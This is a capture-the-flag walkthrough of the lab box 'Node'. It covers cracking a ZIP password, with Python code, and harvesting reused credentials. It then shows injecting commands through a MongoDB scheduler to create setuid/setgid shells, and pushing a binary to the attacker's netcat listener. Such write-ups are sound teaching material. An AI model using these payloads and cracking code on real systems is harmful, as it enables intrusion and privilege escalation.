# Exploitation

## Logging in with found Credentials

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbIvreYUlIOZBdHrES%2F-MJbJSsTx5_U1B_TN0X7%2Fimage.png?alt=media\&token=37eb20b1-6696-4069-9db3-8d9c104d47b2)

Downloading the file and reading it shows that it is base64-encoded. Decoding it into a new file and running `file` on the result shows that it is a zip archive, and trying to unzip it shows that the archive needs a password. These are the commands to get this done:

```
less [file name]                           # contents look like base64
base64 -d [file name] > [new file name]    # decode into a new file
file [new file name]                       # reports: Zip archive data
unzip [new file name]                      # prompts for a password
```

The archive needs a password, so we brute force it with fcrackzip (`-D` selects dictionary mode and `-p` names the wordlist; adding `-u` makes fcrackzip confirm each candidate with unzip, which weeds out the false positives the zip password check byte alone lets through):

```
kali@kali:~/HTB/node$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt test.zip 
possible pw found: magicword ()
```

* password is magicword
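The decode-identify-crack chain above, as an added example in Python (it is not part of the original writeup and not fcrackzip's code). It does in code what `base64 -d`, `file` and `fcrackzip -D -p` did: strips line wrapping and base64-decodes the blob, checks for the `PK\x03\x04` zip signature, and then tries each wordlist entry against the archive's traditional ZipCrypto encryption, confirming a hit by reading the entry through so the CRC-32 is verified (the one-byte password check alone is wrong once in 256 tries, which is what `-u` exists for). The archive, its password (`magicword`, reused from the page) and the five-word stand-in for rockyou are constructed inline, which is why the block also carries a minimal ZipCrypto writer; that writer exists only to build the sample.

```python
import base64
import binascii
import io
import struct
import zipfile
import zlib

ZIP_MAGIC = b"PK\x03\x04"   # the signature `file` keys on for "Zip archive data"
FLAG_ENCRYPTED = 0x0001     # general-purpose flag bit 0: traditional PKWARE encryption


def decode_if_base64(blob: bytes) -> bytes:
    """What `base64 -d` did: if the whole blob is valid base64 (line wrapping
    allowed), return the decoded bytes, otherwise return the input unchanged."""
    compact = b"".join(blob.split())
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error:
        return blob


def crack_zip(zip_bytes: bytes, wordlist):
    """Dictionary attack on a ZipCrypto archive, the check fcrackzip -D -p performs.
    A candidate only counts if the entry reads to the end, so the CRC-32 is verified
    and the 1-in-256 check-byte false positives are rejected. Returns password or None."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        info = zf.infolist()[0]
        if not info.flag_bits & FLAG_ENCRYPTED:
            return None                    # nothing to crack
        for word in wordlist:
            try:
                with zf.open(info, pwd=word.encode()) as f:
                    f.read()               # full read forces the CRC-32 check
                return word
            except (RuntimeError, zipfile.BadZipFile):
                continue                   # bad check byte, or CRC mismatch
    return None


def recover_password(blob: bytes, wordlist):
    """The whole chain from the writeup: base64 -> identify as zip -> dictionary attack."""
    decoded = decode_if_base64(blob)
    if not decoded.startswith(ZIP_MAGIC):
        return None
    return crack_zip(decoded, wordlist)


# ---- sample construction only: a minimal ZipCrypto writer (PKWARE traditional encryption) ----
_CRC_TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    _CRC_TABLE.append(c)


class _ZipCrypto:
    def __init__(self, password: bytes):
        self.keys = [0x12345678, 0x23456789, 0x34567890]   # PKWARE initial key state
        for b in password:
            self._update(b)

    def _update(self, b):
        k = self.keys
        k[0] = (k[0] >> 8) ^ _CRC_TABLE[(k[0] ^ b) & 0xFF]
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = (k[2] >> 8) ^ _CRC_TABLE[(k[2] ^ (k[1] >> 24)) & 0xFF]

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            t = self.keys[2] | 2
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))   # keystream byte
            self._update(p)                                 # keys advance on plaintext
        return bytes(out)


def make_encrypted_zip(name: bytes, data: bytes, password: bytes) -> bytes:
    """One stored (uncompressed) entry with ZipCrypto, hand-packed from the spec."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header; byte 11 is the password check byte (high byte of the CRC).
    # Real writers use random filler bytes; zeros are fine for a constructed sample.
    body = _ZipCrypto(password).encrypt(bytes(11) + bytes([crc >> 24]) + data)
    flags, method, dos_time, dos_date = FLAG_ENCRYPTED, 0, 0x7280, 0x514F   # 2020-10-15 14:20
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, dos_time, dos_date,
                        crc, len(body), len(data), len(name), 0) + name + body
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, dos_time,
                          dos_date, crc, len(body), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


# Constructed sample input: the archive as it would look after `base64` wrapped it.
SAMPLE_ZIP = make_encrypted_zip(b"flag.txt", b"constructed sample content\n", b"magicword")
SAMPLE_B64 = base64.encodebytes(SAMPLE_ZIP)
WORDLIST = ["123456", "password", "iloveyou", "magicword", "letmein"]   # stand-in for rockyou.txt

if __name__ == "__main__":
    print(recover_password(SAMPLE_B64, WORDLIST))
```

`recover_password(SAMPLE_B64, WORDLIST)` returns `"magicword"`; a wordlist without the password returns `None`, as does input that is not base64 or not a zip. The reader of a real archive is the standard library's `zipfile`, so the cracking loop works unchanged on the file from the box once it is decoded.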

## Found source code

While analyzing the source code, the first thing to look for is a password. We can search for one across the whole tree with grep:

```
kali@kali:~/HTB/node/var/www/myplace$ grep -Ri password .          # -R recursive, -i case-insensitive, . = current directory
kali@kali:~/HTB/node/var/www/myplace$ grep -Ri password . | less   # page the output so it is easier to read
```

After looking through the source code not much stood out, but we did notice that the application uses MongoDB.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbbDpddo6oERnW-xyz%2F-MJg6RsAH23V1mG5B9s8%2Fimage.png?alt=media\&token=a4b0d6a5-1a66-4de7-bae3-57944e528fef)

To find where the Mongo connection is configured, we look at app.js and search for "mongo":

```
less app.js
/mongo          # inside less: search forward for "mongo"
```

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbbDpddo6oERnW-xyz%2F-MJg8lSURs9ac8OgHwMR%2Fimage.png?alt=media\&token=ab172ee9-a2f4-4ebf-aa13-e1a57f7371cf)

### Found Username and password

* Username: mark
* Password: 5AYRft73VtFpc84k

## Initial Access

After obtaining the MongoDB password, we try it over SSH and it works: Mark reused the same credentials for SSH and MongoDB. Bad practice, Mark, bad practice.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbbDpddo6oERnW-xyz%2F-MJg9ptpV-3yBc0jpGOk%2Fimage.png?alt=media\&token=d86492eb-1c9e-4676-a86d-045c51b24180)

### Pivoting to TOM

After running LinEnum.sh, something that stood out is a process running as tom.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJgAFidlGr74txGOAel%2F-MJgIGKm5xQ4R8a5SVI6%2Fimage.png?alt=media\&token=0778034b-8444-4c5c-ae88-7bbf9a429e86)

* A Node scheduler running as tom; let's look at it.

Reading that script we find credentials. It also takes every document in the `tasks` collection and passes the `cmd` field straight to `exec`, so anything we can insert into that collection is executed as tom.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJgAFidlGr74txGOAel%2F-MJgK2bmUY4JR226Uetl%2Fimage.png?alt=media\&token=2decb1f9-a6d0-431b-8525-71ef20f03736)

* username: mark
* password: 5AYRft73VtFpc84k

## PrivEsc to Tom User

```
mongo -p -u mark scheduler                                      # -p with no value prompts for the password
> db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/boomer; chmod 6755 /bin/dash;" } )   // bug: chmod targets /bin/dash, not the copy
> db.tasks.find()

ls -la /tmp/boomer                                              # the copy exists but has no setuid bit
```

That first attempt did not work: the `chmod` was applied to `/bin/dash`, which tom does not own, instead of to the copy in `/tmp/boomer`, so the copy never got the bit. Inserting a second task that sets `u+s` on `/tmp/boomer` fixes it. The bit involved is the setuid bit (`u+s`, mode 4000), not the sticky bit: when the file is executed, the process takes the file owner's uid (tom) as its effective uid. The `-p` flag matters too, because dash drops its effective uid back to the real uid at startup unless it is started with `-p`.

```
mark@node:/dev/shm$ mongo -p -u mark scheduler 
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks.insert ( { "cmd" : "chmod u+s /tmp/boomer" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
> ^C
bye
mark@node:/dev/shm$ ls -la /tmp/boomer
-rwsr-xr-x 1 tom tom 154072 Oct 15 14:20 /tmp/boomer
mark@node:/dev/shm$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
$ whoami
tom
```

Ideally we would drop an SSH key so we could log in as tom directly, but unfortunately we don't have permission to do so. So we run LinEnum again from this shell to see if there are any other findings.

## PrivEsc to admin group

After running LinEnum's more thorough scan, we can look at the SUID binaries.

```
bash LinEnum.sh -t     # -t runs the thorough tests
```

Something that stood out:

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJgKguVxEX2ihyLYUwk%2F-MJgThfcJgrbTpmSr_Xq%2Fimage.png?alt=media\&token=e4371850-0fa2-476e-baf0-c77c6691e2ef)

The backup binary is owned by root with group admin, so we need to be in the admin group to use it. To get there we go through MongoDB again, this time having the scheduler (running as tom) move our copy of dash into the admin group and set both the setuid and setgid bits. Two details matter here: a non-root `chown tom:admin` only succeeds because tom is a member of admin, and on Linux a chown clears any setuid/setgid bits already on the file, so the `chmod 6755` has to come after the `chown`, not before it.

```
$ mongo -p -u mark scheduler 
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks.insert( { "cmd" : "chown tom:admin /tmp/boomer; chmod 6755 /tmp/boomer;" } ) 
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
> ^C
bye
$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
```
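Both escalations above abuse the same flaw: the scheduler takes `cmd` straight out of the tasks collection and hands it to `exec`, so whoever can write to that collection runs commands as tom. The following Python is an added example, not the page's scheduler and not the Node code on the box. It models the vulnerable sink with `subprocess.run(..., shell=True)`, builds the task documents used in the writeup (copy a shell and `chmod u+s` it; for the group step, `chown` into the group first and `chmod 6755` after, because chown clears the bits), runs the tom-step payload against a copy of `/bin/sh` in a temporary directory, and checks the result the way `ls -la /tmp/boomer` did, by reading the setuid/setgid bits with `os.stat`. The hardened `run_tasks_hardened` variant and its `ALLOWED_ACTIONS` map are an assumed fix added for contrast, not something from the page; `/bin/sh`, `cp`, `chmod` and `true` are assumed to exist on the host.

```python
import os
import shlex
import stat
import subprocess
import tempfile


def run_tasks_vulnerable(tasks):
    """The sink, modelled on the page's Node scheduler: each document's "cmd" field
    goes straight to a shell, which is what exec(task.cmd) does on the box."""
    codes = []
    for task in tasks:
        proc = subprocess.run(task["cmd"], shell=True, capture_output=True)
        codes.append(proc.returncode)
    return codes


# Assumed fix for contrast: a task names an action, the scheduler owns the argv.
ALLOWED_ACTIONS = {
    "noop": ["true"],
    "disk_usage": ["df", "-h"],
}


def run_tasks_hardened(tasks):
    """Same loop without the injection: unknown actions are rejected, nothing from
    the document reaches a shell, and the argv list is executed without one."""
    results = []
    for task in tasks:
        argv = ALLOWED_ACTIONS.get(task.get("action"))
        if argv is None:
            results.append("rejected")
            continue
        results.append(subprocess.run(argv, capture_output=True).returncode)
    return results


def setuid_payload(src, dst, group=None):
    """Task documents as inserted with db.tasks.insert in the writeup. Copy a shell
    and set u+s on the copy (not on the original, the mistake in the first attempt).
    For the group step: chown first, chmod 6755 second, because an unprivileged
    chown on Linux clears the setuid/setgid bits."""
    q = shlex.quote
    docs = [{"cmd": f"cp {q(src)} {q(dst)}; chmod u+s {q(dst)}"}]
    if group:
        docs.append({"cmd": f"chown :{q(group)} {q(dst)}; chmod 6755 {q(dst)}"})
    return docs


def effective_ids(path):
    """What `ls -la` showed as -rwsr-xr-x: which uid/gid a process running this
    file takes on. dash still needs -p, or it drops the effective uid at startup."""
    st = os.stat(path)
    return {
        "setuid": bool(st.st_mode & stat.S_ISUID),
        "setgid": bool(st.st_mode & stat.S_ISGID),
        "owner_uid": st.st_uid,
        "group_gid": st.st_gid,
        "owned_by_me": st.st_uid == os.getuid(),
    }


def demo(workdir=None):
    """Run the tom-step payload through the vulnerable scheduler against /bin/sh
    (assumed present) and inspect the copy, as the writeup did with /tmp/boomer."""
    workdir = workdir or tempfile.mkdtemp(prefix="scheduler-demo-")
    target = os.path.join(workdir, "boomer")
    codes = run_tasks_vulnerable(setuid_payload("/bin/sh", target))
    ids = effective_ids(target)
    ids["exit_codes"] = codes
    return ids


if __name__ == "__main__":
    print(demo())
```

`demo()` on a normal Linux host returns a dict with `setuid` True and the copy owned by the current user, i.e. the same state `ls -la /tmp/boomer` reported once the second task had run. The group-step payload is built but not executed here, since `chown` into another group only works for a member of that group, which is exactly what the writeup relies on tom being.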

The group PrivEsc worked. Now that we are in the admin group we can access `/usr/local/bin/backup`. We'll transfer it with netcat since the binary is fairly large, and compare `md5sum` on both ends afterwards to confirm the copy is complete.

On our machine, set up a listener:

```
nc -lvnp 8081 > backup     # write whatever arrives on port 8081 to ./backup
```

On the target machine, push the file to the listener:

```
nc [ip] 8081 < /usr/local/bin/backup     # the file we are transferring
```

## Analyzing Backup Binary File

```
kali@kali:~/HTB/node$ strace ./backup        # nothing interesting in the syscall trace

kali@kali:~/HTB/node$ r2 backup 
[0x08048780]> aaa                            # analyze everything
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x08048780]> afl                            # list the functions the analysis found
[0x08048780]> V                              # visual mode (VV for the function graph view)
```
